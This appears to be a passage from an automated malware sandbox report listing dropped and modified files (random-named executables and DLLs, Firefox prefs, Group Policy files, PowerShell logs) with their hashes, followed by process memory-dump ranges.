                                                                                                                                                                    5bbac281f40602c98b2a12082b6de481b7c135b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8

                                                                                                                                                                    SHA512

                                                                                                                                                                    a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\MmoByBS.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6b7269665d6d4db4cb0b5982cc6decc3

                                                                                                                                                                    SHA1

                                                                                                                                                                    5bbac281f40602c98b2a12082b6de481b7c135b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8

                                                                                                                                                                    SHA512

                                                                                                                                                                    a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51kkhogu.q3e.ps1
                                                                                                                                                                    Filesize

                                                                                                                                                                    60B

                                                                                                                                                                    MD5

                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                    SHA256

                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                    SHA512

                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g3zpym0q.default-release\prefs.js
                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    8dc0f29d1a56dcad1dd334e560e5b225

                                                                                                                                                                    SHA1

                                                                                                                                                                    104e06c21de442bb17b465867625840d8ef69c5e

                                                                                                                                                                    SHA256

                                                                                                                                                                    cdbbaac6a191bedd790466883f58bf4b1ae5e8380afe094cc34319e0e4e1219e

                                                                                                                                                                    SHA512

                                                                                                                                                                    1128aec4d3b694e743ac593cb961956d73df591fd105f7d41b8ef053c5f1bde1ca3288ac9bae3ce0f5352e392bf6876e46ec86cb510179b1607183db5e460bad

                                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                                    SHA1

                                                                                                                                                                    36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                                    SHA256

                                                                                                                                                                    b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                                    SHA512

                                                                                                                                                                    676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                    Filesize

                                                                                                                                                                    11KB

                                                                                                                                                                    MD5

                                                                                                                                                                    fab9f278180ec88abfd24b7ae749cf2c

                                                                                                                                                                    SHA1

                                                                                                                                                                    b8eb2842c5c2da032a7296f21ab4b9bdf4b96b90

                                                                                                                                                                    SHA256

                                                                                                                                                                    f625ab1df433fbe5b09f810440159c475fae369788bb5067e7c0d677d7385927

                                                                                                                                                                    SHA512

                                                                                                                                                                    fd400fd8dc1109a63c5efa1f892e9ce0ad0bb27b0cf1078acd513a001a3d9e2653c00ed6824bcad155d750e1e35fc367051687aebe9d4fde36b656291ae436f5

                                                                                                                                                                  • C:\Windows\Temp\szdKxxrFMiVXCdXj\YZvSYIgU\JkdbdRc.dll
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    40f6a2cc59a1b8b2bd8e9f2d3e51e833

                                                                                                                                                                    SHA1

                                                                                                                                                                    84ada4ab4def6dd57e96c9fa70c6699bffc93eb3

                                                                                                                                                                    SHA256

                                                                                                                                                                    c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1

                                                                                                                                                                    SHA512

                                                                                                                                                                    3da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7

                                                                                                                                                                  • C:\Windows\Temp\szdKxxrFMiVXCdXj\YZvSYIgU\JkdbdRc.dll
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    40f6a2cc59a1b8b2bd8e9f2d3e51e833

                                                                                                                                                                    SHA1

                                                                                                                                                                    84ada4ab4def6dd57e96c9fa70c6699bffc93eb3

                                                                                                                                                                    SHA256

                                                                                                                                                                    c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1

                                                                                                                                                                    SHA512

                                                                                                                                                                    3da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7

                                                                                                                                                                  • C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\bOzsvbt.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6b7269665d6d4db4cb0b5982cc6decc3

                                                                                                                                                                    SHA1

                                                                                                                                                                    5bbac281f40602c98b2a12082b6de481b7c135b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8

                                                                                                                                                                    SHA512

                                                                                                                                                                    a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0

                                                                                                                                                                  • C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\bOzsvbt.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6b7269665d6d4db4cb0b5982cc6decc3

                                                                                                                                                                    SHA1

                                                                                                                                                                    5bbac281f40602c98b2a12082b6de481b7c135b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8

                                                                                                                                                                    SHA512

                                                                                                                                                                    a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0

                                                                                                                                                                  • C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\bOzsvbt.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6b7269665d6d4db4cb0b5982cc6decc3

                                                                                                                                                                    SHA1

                                                                                                                                                                    5bbac281f40602c98b2a12082b6de481b7c135b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8

                                                                                                                                                                    SHA512

                                                                                                                                                                    a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0

                                                                                                                                                                  • C:\Windows\system32\GroupPolicy\Machine\Registry.pol
                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    c14d5a132d7e0eae145c81b1ccb40493

                                                                                                                                                                    SHA1

                                                                                                                                                                    cffa445ff88ce84b045cb3ed2249fb9a6ac60f72

                                                                                                                                                                    SHA256

                                                                                                                                                                    029f3aae9b42ea0683317b00e1f39a2bda5259759f189d4fb3a664980c022158

                                                                                                                                                                    SHA512

                                                                                                                                                                    666171b4a6b5fea3ee34c9ebf41b9b23fe2ee7ad7da232f79e69b78ea9b5beecfacfba8d34fa4e8243e094136a738f68e92f5c883b2066ee15b3c58198d0d754

                                                                                                                                                                  • C:\Windows\system32\GroupPolicy\gpt.ini
                                                                                                                                                                    Filesize

                                                                                                                                                                    268B

                                                                                                                                                                    MD5

                                                                                                                                                                    a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                                    SHA1

                                                                                                                                                                    1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                                    SHA256

                                                                                                                                                                    9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                                    SHA512

                                                                                                                                                                    9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                                  • memory/448-489-0x0000000003430000-0x00000000034AA000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    488KB

                                                                                                                                                                  • memory/448-104-0x0000000000D30000-0x0000000001428000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/448-106-0x0000000010000000-0x000000001057D000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB

                                                                                                                                                                  • memory/448-117-0x0000000002400000-0x0000000002485000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    532KB

                                                                                                                                                                  • memory/448-159-0x0000000002C50000-0x0000000002CBA000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    424KB

                                                                                                                                                                  • memory/448-534-0x0000000000D30000-0x0000000001428000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/448-504-0x0000000003E20000-0x0000000003EE7000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    796KB

                                                                                                                                                                  • memory/1292-84-0x00007FFBE7030000-0x00007FFBE7AF1000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/1292-97-0x00007FFBE7030000-0x00007FFBE7AF1000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/1292-86-0x000001B021800000-0x000001B021810000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/1292-85-0x000001B021800000-0x000001B021810000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/1512-99-0x0000000000D40000-0x0000000001438000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/1512-105-0x0000000000D40000-0x0000000001438000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/1512-37-0x0000000000D40000-0x0000000001438000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/1512-38-0x0000000010000000-0x000000001057D000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB

                                                                                                                                                                  • memory/2020-78-0x0000000073350000-0x0000000073B00000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/2020-66-0x00000000032F0000-0x0000000003300000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/2020-65-0x0000000073350000-0x0000000073B00000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/2368-44-0x0000000000F00000-0x0000000000F10000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/2368-63-0x0000000073350000-0x0000000073B00000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/2368-50-0x0000000004130000-0x0000000004196000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/2368-47-0x0000000003840000-0x00000000038A6000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/2368-46-0x00000000037A0000-0x00000000037C2000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2368-45-0x00000000038D0000-0x0000000003EF8000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.2MB

                                                                                                                                                                  • memory/2368-59-0x0000000004740000-0x000000000475E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    120KB

                                                                                                                                                                  • memory/2368-43-0x0000000000F00000-0x0000000000F10000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/2368-42-0x0000000073350000-0x0000000073B00000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/2368-41-0x0000000000E20000-0x0000000000E56000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    216KB

                                                                                                                                                                  • memory/2368-60-0x00000000047F0000-0x000000000483C000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    304KB

                                                                                                                                                                  • memory/2368-58-0x0000000004360000-0x00000000046B4000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    3.3MB

                                                                                                                                                                  • memory/2616-31-0x00007FFBE7030000-0x00007FFBE7AF1000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/2616-28-0x000001B06AFB0000-0x000001B06AFC0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/2616-18-0x000001B06AFB0000-0x000001B06AFC0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/2616-17-0x00007FFBE7030000-0x00007FFBE7AF1000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/2616-16-0x000001B06AEF0000-0x000001B06AF12000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/3040-35-0x0000000000C50000-0x0000000001348000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/3040-12-0x0000000010000000-0x000000001057D000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB

                                                                                                                                                                  • memory/3040-529-0x0000000000C50000-0x0000000001348000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/3040-11-0x0000000000C50000-0x0000000001348000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/3312-528-0x0000000001E10000-0x000000000238D000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB